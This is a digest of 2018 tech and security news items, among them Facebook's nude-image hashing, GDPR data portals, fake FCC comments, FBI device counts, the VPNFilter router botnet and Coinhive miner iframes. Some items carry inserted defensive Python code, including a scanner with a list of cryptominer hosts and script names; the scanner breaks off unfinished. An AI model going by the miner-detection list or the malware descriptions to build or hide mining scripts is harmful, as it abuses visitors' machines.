Hit the (1) key on your keyboard. This will take you a full 10 percent into the video, bypassing all that stuff you’ve heard time and time again, says Redditor u/IssphitiKOzS. In fact, each number key (0) through (9) correlates to a percentage in the video, 0 percent to 90 percent. So, if intros are insanely long, hit the (2) key to go to the 20 percent mark.

If intros are quick, but still grating...

Hit the (right arrow) key or the (l) key on your keyboard. This will send you forward 5 seconds and 10 seconds, respectively. If you prefer, you can simply smash the right arrow key over and over until it looks like the video has actually started.


If you want to learn more helpful YouTube hotkeys—like changing volume, moving a video frame by frame, or quick, mouse-free muting and unmuting—you can check them all out here.


from Lifehacker https://ift.tt/2KUytvO

Facebook’s counterintuitive way to combat nonconsensual porn


In November 2017, Facebook came up with a way to help us keep our nude photos from being shared without our consent.

It sounded crazy: in order to save us from revenge/nonconsensual porn, Facebook wanted us to send in our nude photos.

But it actually made sense: Facebook would create hashes of our nude images, just like law enforcement uses hashes of known child abuse imagery.

Facebook promised that it wouldn’t store the nudes itself but would instead use photo-matching technology to tag the images after they’re sent in. Then, if somebody tried to upload that same image, which would have the same digital footprint or hash value, it would be stopped dead in its tracks before being uploaded.

People can already report intimate images that have been shared without their consent. Such images are removed, and Facebook creates the hash so its systems can automatically recognize an image and block it if somebody tries to post the image again.

But Facebook says it can do more to keep nudes from being shared on its services in the first place.

On Tuesday, Facebook Global Head of Safety Antigone Davis announced that this week, Facebook’s testing a proactive reporting tool, in partnership with an international working group of safety organizations, survivors, and victim advocates, including the Australian Office of the eSafety Commissioner, the Cyber Civil Rights Initiative and The National Network to End Domestic Violence (NNEDV) in the US, the UK Revenge Porn Helpline, and YWCA Canada.

The pilot program first launched in Australia. Now, it’s also going to be tested in the UK, the US and Canada.

Facebook’s work on the project has included Davis and her team traveling to nine countries across four continents, from Kenya to Sweden, listening to stories about the abuse and cruelty that women face online. While people of all genders, ages and sexual orientations are targeted, Davis notes that women are nearly twice as likely to be targeted with nonconsensual/revenge porn as men.

From her public post:

From anxiety and depression to the loss of a personal relationship or a job, this violation of privacy can be devastating.

The photo hashing project is a work in progress, but here’s how it works now:

  1. Contact one of Facebook’s partners to submit a form: see the links above.
  2. You’ll then receive an email containing what Facebook says is a secure, one-time upload link.
  3. Use the link to upload images you fear will be shared.
  4. A “specifically trained” human – just one, Facebook said – from its Community Operations Safety Team will review the image to make sure it violates Facebook policy against nudity and sexuality. If it does, they’ll create a hash that will allow the platform to identify future uploads of the image(s) without keeping copies of them on its servers.
  5. Facebook will then notify victims via email and will delete the images from its servers “no later” than within a week.
  6. Facebook will store the hashes so any time someone tries to upload an image with the same hash, it will be blocked on its services – that includes Facebook, Instagram or Messenger.

True, initially, you do have to hand over the photo in question in order to create the hash. But after that, the hash will be able to help the online platform more or less instantly answer the question “Do I know that photo?” – and to block its reposting – without you having to send the photo again.

The initial Australian pilot raised questions that Facebook has since tried to tackle. For example, what about false reporting? What safeguards are in place to ensure that people can’t take any old picture they want – a non-porn publicity photo, for example – and send it in, under the false premise that it’s a nude and that it’s a photo they themselves have the rights to have expunged from social media circulation?

As Facebook’s Chief Security Officer Alex Stamos tweeted in November, that’s why we have to trust the humans whose eyes will be reviewing the photos … and why those photos won’t be blurred:

Do you trust Facebook with content as sensitive as this? Its record on privacy isn’t good, but its record on security is.

I’m inclined to think that this is a good step, at any rate. Hashing is an important tool in the battle to keep child abuse imagery offline, and it makes sense to apply it in the battle against revenge porn.

A primer on image hashing

This is how it works: A hash is created by feeding a photo into a hashing function. What comes out the other end is a digital fingerprint that looks like a short jumble of letters and numbers. You can’t turn the hash back into the photo but the same photo, or identical copies of it, will always create the same hash.

So, a hash of your most intimate picture is no more revealing than this:

48008908c31b9c8f8ba6bf2a4a283f29c15309b1

Since 2008, the National Center for Missing & Exploited Children (NCMEC) has made available a list of hash values for known child sexual abuse images, provided by ISPs, that enables companies to check large volumes of files for matches without those companies themselves having to keep copies of offending images.

Microsoft at one point donated its PhotoDNA technology to the effort. Facebook’s likely using its own sophisticated image recognition technology for the nude-images project, but it’s instructive to look at how PhotoDNA works.

PhotoDNA creates a unique signature for an image by converting it to black and white, resizing it, and breaking it into a grid. In each grid cell, the technology finds a histogram of intensity gradients or edges from which it derives its so-called DNA. Images with similar DNA can then be matched.

Given that the amount of data in the DNA is small, large data sets can be scanned quickly, enabling companies including Microsoft, Google, Verizon, Twitter, Facebook and Yahoo to find needles in haystacks and sniff out illegal child abuse imagery. It works even if the images have been resized or cropped.
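The two kinds of fingerprint described above behave very differently, and the difference is the whole point of the primer: a cryptographic hash such as the SHA-1 value shown earlier changes completely if a single pixel changes, while a PhotoDNA-style descriptor survives resizing and small edits. The Python below is an added example written for this page; it is not PhotoDNA, which is proprietary, and not Facebook's matching system. It follows the four steps the text lists (black and white, resize, grid, per-cell gradient histogram) in a deliberately simplified form, and the grid size, the distance threshold and the sample pictures are assumptions constructed for the demonstration.

```python
import hashlib

SIZE = 16        # every image is resampled to SIZE x SIZE before analysis (assumption)
CELLS = 4        # the resampled image is split into a CELLS x CELLS grid (assumption)
THRESHOLD = 60   # descriptors closer than this (L1 distance) count as the same picture


def to_gray(img):
    """Step 1: convert to black and white. Pixels are 0..255 ints or (r, g, b) tuples."""
    return [[p if isinstance(p, int) else (299 * p[0] + 587 * p[1] + 114 * p[2]) // 1000
             for p in row] for row in img]


def resample(gray, size=SIZE):
    """Step 2: box-filter resize, so a rescaled copy collapses onto the same grid."""
    h, w = len(gray), len(gray[0])
    out = []
    for i in range(size):
        y0, y1 = i * h // size, max((i + 1) * h // size, i * h // size + 1)
        row = []
        for j in range(size):
            x0, x1 = j * w // size, max((j + 1) * w // size, j * w // size + 1)
            block = [gray[y][x] for y in range(y0, y1) for x in range(x0, x1)]
            row.append(sum(block) // len(block))
        out.append(row)
    return out


def descriptor(img):
    """Steps 3-4: per grid cell, a 4-bin histogram of gradient energy (brighter to the
    right, to the left, downward, upward), scaled by the image's total gradient energy
    so that contrast changes and tiny retouches barely move it."""
    small = resample(to_gray(img))
    cell = SIZE // CELLS
    hist = [[0, 0, 0, 0] for _ in range(CELLS * CELLS)]
    for y in range(SIZE):
        for x in range(SIZE):
            c = (y // cell) * CELLS + (x // cell)
            dx = small[y][x + 1] - small[y][x] if x + 1 < SIZE else 0
            dy = small[y + 1][x] - small[y][x] if y + 1 < SIZE else 0
            hist[c][0 if dx > 0 else 1] += abs(dx)
            hist[c][2 if dy > 0 else 3] += abs(dy)
    total = sum(sum(h) for h in hist)
    return [v * 255 // total if total else 0 for h in hist for v in h]


def distance(d1, d2):
    """How different two descriptors are; 0 means visually identical."""
    return sum(abs(a - b) for a, b in zip(d1, d2))


def exact_hash(img):
    """The cryptographic fingerprint from the primer: identical pixels, identical hash."""
    return hashlib.sha1(repr(to_gray(img)).encode()).hexdigest()


def build_db(images):
    """What the platform keeps: fingerprints only, never the pictures themselves."""
    return {"exact": {exact_hash(i) for i in images},
            "perceptual": [descriptor(i) for i in images]}


def match(img, db):
    """Answer 'Do I know that photo?': exact match first, then nearest perceptual match."""
    if exact_hash(img) in db["exact"]:
        return "exact"
    d = descriptor(img)
    if db["perceptual"] and min(distance(d, k) for k in db["perceptual"]) <= THRESHOLD:
        return "perceptual"
    return None


def square_image(size, top, bottom):
    """Constructed sample picture: a black canvas with one bright square."""
    return [[255 if top <= y < bottom and top <= x < bottom else 0
             for x in range(size)] for y in range(size)]


ORIGINAL = square_image(32, 4, 16)      # the reported picture
RESCALED = square_image(64, 8, 32)      # the same picture at twice the resolution
RETOUCHED = [row[:] for row in ORIGINAL]
RETOUCHED[20][20] = 30                  # one pixel altered: breaks SHA-1, not the "DNA"
DIFFERENT = square_image(32, 20, 32)    # an unrelated picture

DB = build_db([ORIGINAL])

if __name__ == "__main__":
    for name, img in [("original", ORIGINAL), ("rescaled", RESCALED),
                      ("retouched", RETOUCHED), ("different", DIFFERENT)]:
        print(name, exact_hash(img)[:12], match(img, DB))
```

Only `ORIGINAL` is ever fed to `build_db`, yet the rescaled and retouched copies are still recognised, while the unrelated picture is not. The threshold is where the engineering lives in a real deployment: too tight and trivial re-encodes slip through, too loose and unrelated images are blocked, which is exactly the false-positive concern the human review step is meant to address.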

Davis says that the photo hashing is just one step “to help people who fear an intimate image will be shared without their consent.”

We look forward to learning from this pilot and further improving our tools for people in devastating situations like these.



from Naked Security https://ift.tt/2KROnHe

Microsoft will extend GDPR rights to customers worldwide

Microsoft has announced it will extend the rights that are at the heart of GDPR to all of their consumer customers worldwide.

“Known as Data Subject Rights, they include the right to know what data we collect about you, to correct that data, to delete it and even to take it somewhere else,” Julie Brill, Corporate VP and Deputy General Counsel at Microsoft, explained.

Users can access these tools through Microsoft’s privacy dashboard.

Changes to the dashboard that allow Microsoft to comply with GDPR requirements were already made in January 2018, when the wider availability of the Windows Diagnostic Data Viewer tool was announced.

A commitment to GDPR and privacy

“GDPR is an important step forward for privacy rights in Europe and around the world, and we’ve been enthusiastic supporters of GDPR since it was first proposed in 2012,” Brill noted.

“We are committed to making sure that our products and services comply with GDPR. That’s why we’ve had more than 1,600 engineers across the company working on GDPR projects. Since its enactment in 2016, we’ve made significant investments to redesign our tools, systems and processes to meet the requirements of GDPR.”

She also noted that changes to the tools can be expected.

“As our customers use our tools and experience other features we’ll also listen to their feedback and suggestions for improvements. Because regulatory interpretations change with experience and changing circumstances over time, we will constantly evaluate our products, services and data uses as understanding of GDPR evolves.”

The company’s GDPR compliance efforts have also resulted in an update of the privacy statement governing their consumer products and services.

As Greg McNeal, Professor of Law & Policy at Pepperdine Law, has pointed out, Microsoft seems to have used the advent of GDPR as an opportunity to achieve privacy goals without suffering a business impact.


from Help Net Security https://ift.tt/2GMx8Vf

European users can request a copy of the data Apple keeps on them

Apple has set up a Data and Privacy portal where users can make a request to download all the data Apple has on them, correct their personal information, deactivate or delete their account.

The creation of the portal is a direct result of the GDPR legislation coming into force today (May 25, 2018) and will be made available to all users.

About the “Get a copy of your data” option

For now, only users from the European Union, Iceland, Liechtenstein, Norway, and Switzerland will be able to download the Apple ID and iCloud data associated with their account. Users from the rest of the world will get the option in the coming months.

“Any data that isn’t provided is either in a form that is not personally identifiable or linked to your Apple ID, is stored in an end-to-end encrypted format that Apple cannot decrypt, or is not stored by Apple at all. Additionally, some data may have been held only for a very short time and is no longer on our servers,” the company explained.

The company promises to make the copy of the Apple ID and iCloud data available within a week. That might seem long to some, but Apple wants to make sure that the request for data was made by the account owner, and verifying that takes a while.

Once the data is ready, users are notified and have two weeks to download it – after that period has passed, the data is automatically deleted. Of course, they can always make a new request.

Other tools

Users are directed to correct their account information via the Settings on their iOS device, System Preferences on their Mac, and via Account Management on appleid.apple.com.

Deactivating or deleting one’s account is as easy as making a few clicks. Again, Apple explains clearly what each action entails and how long the process might take (up to seven days).


from Help Net Security https://ift.tt/2LnRtUB

New infosec products of the week: May 25, 2018

Prioritizing open source security alerts

WhiteSource launched its next-generation Software Composition Analysis solutions – Effective Usage Analysis. The technology provides details beyond simply which components are present in the application, delving deeper with actionable insights on how components are being used, highlighting their impact on the security of the application.

Passwork introduces new password manager

Passwork.me is a new password manager designed to enhance security when working with corporate passwords. Through this password manager, the company can safely store all their passwords and employees can search the right passwords quickly. The administrator controls all the user rights as well as keeps track of any changes or actions taken by the members.

High-reliability packet capture in enterprise networks

DAG Cards natively support a wide range of open source applications, including Wireshark, Bro, SNORT, Suricata and any libpcap application, through DAG-enabled libraries. Both the 9.5G4 and 9.5G4F feature standard DAG Card functionality such as interrupt-free, zero-copy packet capture direct to memory and onboard, hardware-based filtering, duplication and steering. They also provide onboard processing for a host of enterprise and encapsulation protocols, such as MPLS and VLAN, for load balancing, classification and filtering.

Automated threat detection & investigation app for the Palo Alto Networks Application Framework

SecBI unveiled its Autonomous Investigation app for the Palo Alto Networks Application Framework. SecBI’s Autonomous Investigation technology uses network traffic analysis (NTA) based on unsupervised machine learning to detect complex and stealthy cybersecurity threats. Security analysts are presented with the full scope of the suspicious incident’s kill chain, including visibility to all affected users and devices, as well as infection points and malicious communications, enabling fast and complete remediation.

Measure a cyber program’s maturity and residual risk

Kudelski Security announced the U.S. availability of Secure Blueprint. This product provides a centralized system for program management as well as easy-to-use dashboards that deliver a dynamic representation of cyber program maturity, enterprise risks and other information about which CISOs need to engage key stakeholders, allowing them to plan and prioritize cybersecurity investments.

Cognito Recall delivers AI-assisted threat hunting

Vectra announced a major expansion of the Cognito platform with Cognito Recall. It collects, analyzes and stores as much metadata as needed for forensic investigations and compliance mandates like GDPR. It also empowers AI-assisted threat hunting using indicators of compromise and provides a chain of forensic evidence behind every cyberattack.

Exponential‐e launches Cyber Security Operations Centre

Exponential‐e launched its Cyber Security Operations Centre (CSOC), capable of monitoring for compliance to multiple standards, from best practice through to PCI-DSS and ISO 27001. The very nature of this type of monitoring lifts a heavy burden when adhering to regulations such as GDPR.

Cato unveils SD-WAN with cloud-based threat hunting system

The Cato Threat Hunting System leverages traffic context, unobscured network and endpoint visibility to pinpoint threats and reduce dwell time. It represents the first time that threat hunting is done without deploying a dedicated and costly data collection infrastructure within the enterprise.


from Help Net Security https://ift.tt/2GOCuiT

Monét X Change Knows Sponges Are a Queen's Secret Weapon

New York City drag queen Monét X Change thinks that sponges are the most useful item in your cupboard. In the premiere episode of RuPaul’s Drag Race’s 10th season, the self-proclaimed “Mr. Clean of Drag” created an entire ensemble out of scrubby absorbent pads.

In this video, she shares some of her favorite sponge uses, beyond turning a sickening look on the runway. Scrub through (pun intended) to see how sponges help with beauty, pain, and getting a drag queen’s attention.


from Lifehacker https://ift.tt/2LtnHhi

2 million stolen identities used to make fake net neutrality comments


You may recall all those reports of fake and bot-generated comments left in what former New York Attorney General Eric Schneiderman called the “deeply corrupted” public comment period for net neutrality.

Now, it looks like two million stolen identities were used to make those fake net neutrality comments. Most crucially, two of those identities were stolen from senators.

On Monday, the two senators – Jeff Merkley (D-OR) and Pat Toomey (R-PA) – called on the Federal Communications Commission (FCC) to investigate identity theft and fraud in the public comments left for the agency during the time leading up to the decision to kill net neutrality in December.

From their letter, sent to FCC Chairman Ajit Pai:

Late last year, the identities of as many as two million Americans were stolen and used to file fake comments during the Federal Communications Commission’s (FCC’s) comment period for the net neutrality rule.

We were among those whose identities were misused to express viewpoints we do not hold. We are writing to express our concerns about these fake comments and the need to identify and address fraudulent behavior in the rulemaking process.

A public comment system that isn’t secured in some way can’t protect government agencies such as the FCC from fraudsters who pollute the process, the senators said; nor can it protect participants from having fraudsters assume their identities:

The first three words in our Constitution are, ‘We the People.’ The federal rulemaking process is an essential part of our democracy and allows Americans the opportunity to express their opinions on how government agencies decide important regulatory issues. As such, we are concerned about the aforementioned fraudulent activity. We need to prevent the deliberate misuse of Americans’ personal information and ensure that the FCC is working to protect against current and future vulnerabilities in its system.

Toomey and Merkley called on the FCC to employ simple security measures, such as CAPTCHA, or Completely Automated Procedures for Telling Computers and Humans Apart, to weed out bot-generated comments.

This technology would ensure that a human, not a machine, is using a computer to submit comments.

“Ensure?” Well, that’s giving CAPTCHA a bit more credit than it deserves, given all the ways that human researchers have found to automatically trick the tests.

The point of CAPTCHA or reCAPTCHA challenges is to act as a gateway that lets humans through but stops or slows down bots (software robots). A bot that can solve a CAPTCHA or reCAPTCHA automatically defeats the whole point of the test, but that’s what keeps happening.

But we get the point the senators are trying to make: just do something to stop these bots.

And while you’re at it, the senators want the FCC to figure out who’s behind the fake comments. They also want public disclosure on the total number of fake comments that were filed during the net neutrality public comment period.

The senators also have this list of specific questions for the FCC:

  • How is the FCC working with the Department of Justice to identify those who submitted fake comments?
  • Is the FCC working with state attorneys general to determine whether state crimes were broken when these identities were stolen?
  • What measures is the FCC taking to ensure this does not happen in the future?
  • How can the FCC track down who misused the identities of 2 million Americans?
  • Can the FCC determine how many of the fake comments on record were submitted by bots, a software application that runs automated tasks (scripts) over the internet?
  • Has the FCC considered using a CAPTCHA, or other security technology, to prevent fraudulent machine input?
  • Is the FCC aware of any foreign government submitting fake comments and for what purpose?

I don’t know how the FCC will go about finding out which of the 23 million comments it received last year were fake. But for what it’s worth, Gizmodo’s Dell Cameron found one that seemed a pretty cut-and-dried version of BS: it’s doubtful that Barack Obama would speak about his own net neutrality protections in this way:

According to Pew Research, only 6% of the comments were unique. Potentially millions could have been submitted by bots. What’s more, 57% of comments used temporary or duplicate email addresses, and seven popular comments accounted for 38% of all submissions.

The FCC refused to postpone its 14 December vote on net neutrality in order to investigate a public comment period that had obviously been clotted with bots, memes, and input from people who don’t actually exist. At any rate, it wasn’t even interested in hearing the outpouring of support from Joe Schmoes. Rather, it was zeroing in on legal comments in the submitted content, as Brian Hart, the FCC’s head of media relations, told Wired:

The purpose of a rulemaking proceeding is not to see who can dump the most form letters into a docket. Rather, it is to gather facts and legal arguments so that the Commission can reach a well-supported decision.

Senators, respectfully, forget CAPTCHA. What the FCC really needs to do is to read the how-many-bots analysis carried out by Wired after the FCC declined to look itself at how gunky the comments were. The magazine relied on the help of FiscalNote, a company that processes public comments on behalf of corporations to help them make sense of the policy landscape.

One of the techniques FiscalNote employed (its researchers had previously identified nearly one million bot submissions in the FCC’s comments, all of them opposing net neutrality) was to detect paragraph patterns, such as stringing together 35 synonymous words and phrases in a particular order to form similar, but not identical, comments.
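The pattern FiscalNote describes, a fixed sentence skeleton with interchangeable synonyms slotted in, is detectable precisely because the substitutions come from a finite list: map every synonym back to its class and the "similar but not identical" comments collapse onto one string. The Python below is an added example, not FiscalNote's or Wired's code, that does this over a small constructed docket. The synonym table is a five-class stand-in for the roughly 35 phrases the article mentions (the real list is not on the page), and the sample comments and the `min_group` cutoff are assumptions.

```python
import re
from collections import defaultdict

# Constructed synonym classes standing in for the interchangeable phrases a
# comment-generating template draws from; the real list is not on the page.
SYNONYMS = {
    "demand": ["demand", "insist on", "ask for"],
    "strong": ["strong", "robust", "firm"],
    "rules": ["rules", "regulations", "protections"],
    "people": ["people", "citizens", "americans"],
    "need": ["need", "deserve", "require"],
}
CANON = {phrase: cls for cls, phrases in SYNONYMS.items() for phrase in phrases}

# Longest phrases first so "insist on" is matched as a unit; a single pass means a
# class marker written by one substitution is never rewritten by another.
PHRASE_RE = re.compile(
    r"\b(" + "|".join(re.escape(p) for p in sorted(CANON, key=len, reverse=True)) + r")\b"
)


def skeleton(comment):
    """Replace each synonym with its class marker; templated comments collapse to one string."""
    text = PHRASE_RE.sub(lambda m: "<" + CANON[m.group(1)] + ">", comment.lower())
    return " ".join(re.findall(r"<[a-z]+>|[a-z']+", text))


def find_templates(comments, min_group=3):
    """Group comments by skeleton; a skeleton shared by min_group or more submissions is
    treated as a template. Returns {skeleton: [indices of matching comments]}."""
    groups = defaultdict(list)
    for idx, comment in enumerate(comments):
        groups[skeleton(comment)].append(idx)
    return {sk: idxs for sk, idxs in groups.items() if len(idxs) >= min_group}


def templated_share(comments, min_group=3):
    """Fraction of the docket explained by detected templates."""
    flagged = sum(len(idxs) for idxs in find_templates(comments, min_group).values())
    return flagged / len(comments) if comments else 0.0


# Constructed sample docket: four spins of one template plus one genuine comment.
SAMPLE_COMMENTS = [
    "I demand strong rules because citizens need a free internet.",
    "I insist on robust protections because Americans deserve a free internet.",
    "I ask for firm regulations because people require a free internet.",
    "My small business relies on the open internet. Please keep the 2015 rules in place.",
    "I demand strong rules because people need a free internet.",
]

if __name__ == "__main__":
    for sk, idxs in find_templates(SAMPLE_COMMENTS).items():
        print(f"template hit by {len(idxs)} comments: {sk}")
    print(f"templated share: {templated_share(SAMPLE_COMMENTS):.0%}")
```

Exact duplicates fall into the same skeleton group as their synonym-swapped siblings, so the one pass covers both the "seven popular comments" problem and the harder near-duplicate case; a template that also shuffles clause order would need an order-insensitive skeleton (a sorted bag of class markers, say) on top of this.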

Sources told Gizmodo last year that Pai quietly issued a directive telling the FCC’s staff to back away from filtering out fake comments during the proceeding. Doing so would likely backfire, the thinking went: it could lead to accusations that the agency was censoring pro-net neutrality comments.

Well, that’s fair, actually. Pro- and anti-net-neutrality bots turned that comment process into a bot romper room. From Gizmodo:

Over 7 million comments included the phrase: ‘I am in favor of strong net neutrality under Title II of the Telecommunications Act.’

We may side with one or the other bot groups, but given that WANAL (We, as in most all of us except lawyers, Are Not A Lawyer) the FCC couldn’t give a hoot about what our chattering, identity-thieving, non-legal-argument robots sputter on about.



from Naked Security https://ift.tt/2J69OXY

FBI admits to inflating number of crime-related devices it can’t crack


Investigators can’t get into 7,775 devices, FBI Director Christopher Wray repeatedly claimed in 2017, using the scary statistic to argue for encryption backdoors.

He made the same “this is letting the crooks go dark” argument over and over, including on 7 December, when he testified before the House Judiciary Committee. At that time, he said that selective encryption access is possible without jeopardizing everybody’s device encryption. The need for it is beyond urgent, he said: it’s vital to protect innocent citizens from criminals and terrorists who are using encrypted devices to “go dark.”

Nah, the FBI has now admitted. On Tuesday, The Washington Post reported that the FBI has admitted that the 7,800 number is a “grossly inflated” figment of FBI imagination, or what the FBI is saying is a miscount. It’s more like 1,200… maybe 2,000… honestly, the bureau isn’t really sure how many uncrackables it’s dealing with.

According to The Post, FBI officials say that they first became aware of the miscount about a month ago and still haven’t come up with an accurate count of how many encrypted phones they received as part of criminal investigations last year.

The Post quoted numbers from people who are familiar with the work: last week, they put an internal estimate of the correct number of locked phones at 1,200. Officials anticipate that number to change as they launch a new audit, which could take weeks to complete.

The FBI issued this statement on Tuesday:

The FBI’s initial assessment is that programming errors resulted in significant over-counting of mobile devices reported.

How did the number blow up? The bureau blamed the inaccuracy on the use of three distinct databases, which led to repeated counting of the same phones. People familiar with the work said that when the methodology was tested in April 2016, the tests didn’t reveal the flaw.

OK, so we tripled the number, the FBI said. But that doesn’t mean that “Going Dark” isn’t a “serious problem” for law enforcement. From its statement:

Going Dark remains a serious problem for the FBI, as well as other federal, state, local and international law enforcement partners… The FBI will continue pursuing a solution that ensures law enforcement can access evidence of criminal activity with appropriate legal authority.

How seriously should we take the FBI’s sloppiness with numbers? One way of looking at it is that this attention to an exaggerated number is a cheap shot at the cops. After all, the percentage of devices that are encrypted will increase toward 100%. So if we argue against the FBI now, on the grounds that the number is exaggerated, we’ll inevitably be wrong as the FBI’s exaggeration approaches reality.

Another way to approach the inflated number is that the FBI has been using it as a central core of the Department of Justice’s obvious push for backdoors. It’s part of the argument for why baking backdoors into encryption is necessary. But with the news about the number’s inaccuracy comes the realization that the FBI/DOJ’s argument for backdoors is being pushed forward without much care for whether one of its central tenets is in fact true.



from Naked Security https://ift.tt/2knU1G0

VPNFilter malware compromises over 500,000 networking devices around the world

Cisco Talos researchers have flagged a huge botnet of small and home office routers and NAS devices, capable of collecting communications and data and launching cyber attacks.

About the VPNFilter malware

The malware that makes it all possible has been dubbed VPNFilter. It’s persistent, modular, and delivered in several stages.


The stage 1 malware’s main task is to persist through reboots and to discover the IP address of the current stage 2 deployment server.

The stage 2 malware is downloaded from those servers (one of which has been seized by the FBI) and is capable of collecting files, exfiltrating data, managing the device and executing code on it.

Some versions of it also have the capability of overwriting a critical portion of the device’s firmware and rebooting the device, effectively rendering it unusable. Although only some versions carry this, the researchers pointed out that it’s more than likely that the threat actor running the botnet can deploy this self-destruct command to most devices it controls.

The stage 3 modules are effectively plugins for the stage 2 malware. One can sniff and collect traffic that passes through the device (including theft of website credentials and monitoring of Modbus SCADA protocols), another allows the malware to communicate with the C&C server via Tor. The researchers believe there are other plugins, but so far they’ve only been able to discover and analyze those two.

The data collection capability could be used to assess the potential value of the network that the device serves.

“If the network was deemed as having information of potential interest to the threat actor, they may choose to continue collecting content that passes through the device or to propagate into the connected network for data collection,” the researchers noted.

“At the time of this posting, we have not been able to acquire a third-stage plugin that would enable further exploitation of the network served by the device. However, we have seen indications that it does exist, and we assess that it is highly likely that such an advanced actor would naturally include that capability in malware that is this modular.”

About the VPNFilter botnet and likely botmaster(s)

The botnet has been slowly growing since at least 2016, the researchers say, and currently consists of at least 500,000 infected devices in some 54 countries around the world.

“The known devices affected by VPNFilter are Linksys, MikroTik, NETGEAR and TP-Link networking equipment in the small and home office (SOHO) space, as well as QNAP network-attached storage (NAS) devices. No other vendors, including Cisco, have been observed as infected by VPNFilter, but our research continues,” they shared.

“The type of devices targeted by this actor are difficult to defend. They are frequently on the perimeter of the network, with no intrusion protection system (IPS) in place, and typically do not have an available host-based protection system such as an anti-virus (AV) package. We are unsure of the particular exploit used in any given case, but most devices targeted, particularly in older versions, have known public exploits or default credentials that make compromise relatively straightforward.”

(More details about the specific targeted devices can be found here.)

The researchers noted that their research is far from complete, but they went public with it because they fear the botnet will soon be used for attacks against targets in the Ukraine.

“The code of this malware overlaps with versions of the BlackEnergy malware — which was responsible for multiple large-scale attacks that targeted devices in Ukraine. While this isn’t definitive by any means, we have also observed VPNFilter, a potentially destructive malware, actively infecting Ukrainian hosts at an alarming rate, utilizing a command and control (C2) infrastructure dedicated to that country. Weighing these factors together, we felt it was best to publish our findings so far prior to completing our research.”

The similarity to BlackEnergy and the recent focus on Ukrainian hosts seem to point to a Russian-backed actor operating the botnet, although it’s impossible to know for sure.

“This is a very sophisticated, multi-stage malware that allows attackers to spy on all network traffic and deploy destructive commands to industrial devices in critical infrastructure networks,” commented Phil Neray, VP of Industrial Cybersecurity at CyberX.

“Russian threat actors have previously used similar tactics in cyberattacks on the Ukrainian electrical grid. While the recent burst of activity also targets the Ukraine, the malware exploits vulnerabilities in devices that are widely used around the world — which means the same attack infrastructure could easily be used to target critical infrastructure networks in the US, the UK, Germany and any other countries seen as enemies of the attackers.”

What to do?

Cisco Talos has created and deployed more than 100 Snort signatures for the publicly known vulnerabilities affecting the devices targeted by VPNFilter, and has blacklisted the domains associated with the threat.

The company has also notified the manufacturers of those devices about the threat and shared their research with international law enforcement and the Cyber Threat Alliance.

Owners of the affected devices should reboot them to remove the non-persistent malware elements and then reset them to factory defaults, which should get rid of the persistent, stage 1 malware.

Owners should then contact the manufacturer for instructions on how to make sure the device is updated to the most recent firmware/software version. Changing any default credentials is also a good idea, as is turning off remote management of the device.

Since there’s no easy way to determine whether a device has been compromised by the VPNFilter malware or not, Cisco researchers advise all owners of the targeted SOHO and NAS devices to go through those steps.


from Help Net Security https://ift.tt/2GLnEtA

Impress Your Guests With Instant Pot Lava Cakes 

A dinner party without dessert is no kind of party at all, but there’s no reason to stress yourself out with a croquembouche. Molten chocolate cakes have a decadent 1980s vibe to them, and these babies—which are adapted from this recipe by Queen Nigella—have never failed to impress. Using the Instant Pot means they cook up fresh and hot in under 10 minutes, and you can pre-batch the batter a day (or two) ahead of time—all you have to do the day of is scoop it into ramekins and let the pressure cooker do its thing.


from Lifehacker https://ift.tt/2s2UqBX

How a URL shortener allows malicious actors to hijack visitors’ CPU power

URL shorteners are often used by malware peddlers and attackers to trick users into following a link they otherwise wouldn’t. But Coinhive’s URL shortener carries an added danger: your CPU power can be surreptitiously hijacked to mine Monero.

About the cnhv.co URL shortener

“If you have a URL you’d like to forward your users to, you can create a cnhv.co shortlink to it. The user has to solve a number of hashes (adjustable by you) and is automatically forwarded to the target URL afterwards,” Coinhive explains.

When users click on the link, they first see an interstitial page showing them a progress bar:


Once the specified number of hashes is solved, they are automatically redirected to the destination URL.

Cnhv.co is meant to be used by site owners to monetize traffic from their website visitors so that they don’t have to show ads or so that the visitors don’t have to pay for the content. Ideally, the site owner should outright tell the visitors what the shortener is doing.

Unfortunately, the shortener has also become another way for scummy site owners and attackers who have compromised websites to mine cryptocurrency while the visitors are none the wiser about what’s happening to their computers.

Cryptomining through hidden URL shorteners

In general, the miner JavaScript is loaded only if a visitor clicks on the shortened URL/link. But malicious users have found a way for the mining to be triggered without user interaction.

Sucuri researchers have flagged hundreds of websites that have been injected with iFrames loading the cnhv.co URL shortener, which allows it to be automatically loaded alongside the rest of the web page (no action on the part of the user is needed) and to initiate the mining.

“The miner script is not being directly loaded from your website but rather through the cnhv[.]co website. It adds what could be viewed as an additional layer of ambiguity and thereby helps it evade detection as some major anti-virus/information security companies do not have it listed as suspicious yet, though many will detect it once the main script coinhive.min.js is loaded,” Sucuri’s Luke Leal explains.

But how does all of this remain hidden from the visitor? Well, the malicious actors have had the brilliant idea of setting the size of the iFrame to 1×1 pixels, so that visitors are unlikely to notice the iFrame on the page (it looks like a speck) and will definitely not see the hashing progress bar.
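The 1×1 iFrame trick is easy to spot once you know to look for it. The following is an added example, not code from Sucuri, Coinhive or Help Net Security: a small HTMLParser-based scanner that a site owner could run over saved copies of their own pages to flag frames pointing at the cnhv.co shortener, any third-party frame collapsed to 1×1 or hidden by inline CSS, and script tags that pull in coinhive.min.js. The host list is an assumption built from the names in this write-up (extend it from your own threat intelligence), and the sample page, including the short code in it, is constructed for the demo.

```python
"""Scan page HTML for hidden iframes and miner script tags.

Added example: this is not Sucuri's or Coinhive's code. It is a small
HTMLParser-based check a site owner could run over their own saved pages
to catch the 1x1 cnhv.co iframe trick. The host list and the sample
page below are constructed for the demo.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts named in the write-up (assumed list); extend from your own threat intel.
MINER_HOSTS = {"cnhv.co", "coinhive.com"}
# Script file name named in the write-up (loaded by the shortlink page).
MINER_SCRIPT_NAMES = ("coinhive.min.js",)


def _host(url):
    """Hostname of a src attribute, '' for relative or empty URLs."""
    return (urlparse(url or "").hostname or "").lower()


def _is_tiny(value):
    """True when a width/height attribute is 0 or 1 (with or without 'px')."""
    if not value:
        return False
    digits = "".join(ch for ch in value if ch.isdigit())
    return digits != "" and int(digits) <= 1


def _style_hides(style):
    """True when inline CSS collapses or hides the element."""
    s = (style or "").replace(" ", "").lower()
    hiding = ("display:none", "visibility:hidden",
              "width:0", "width:1px", "height:0", "height:1px")
    return any(tok in s for tok in hiding)


class MinerFrameScanner(HTMLParser):
    """Collects findings as dicts with keys: kind, src, hidden."""

    def __init__(self):
        super().__init__()
        self.findings = []

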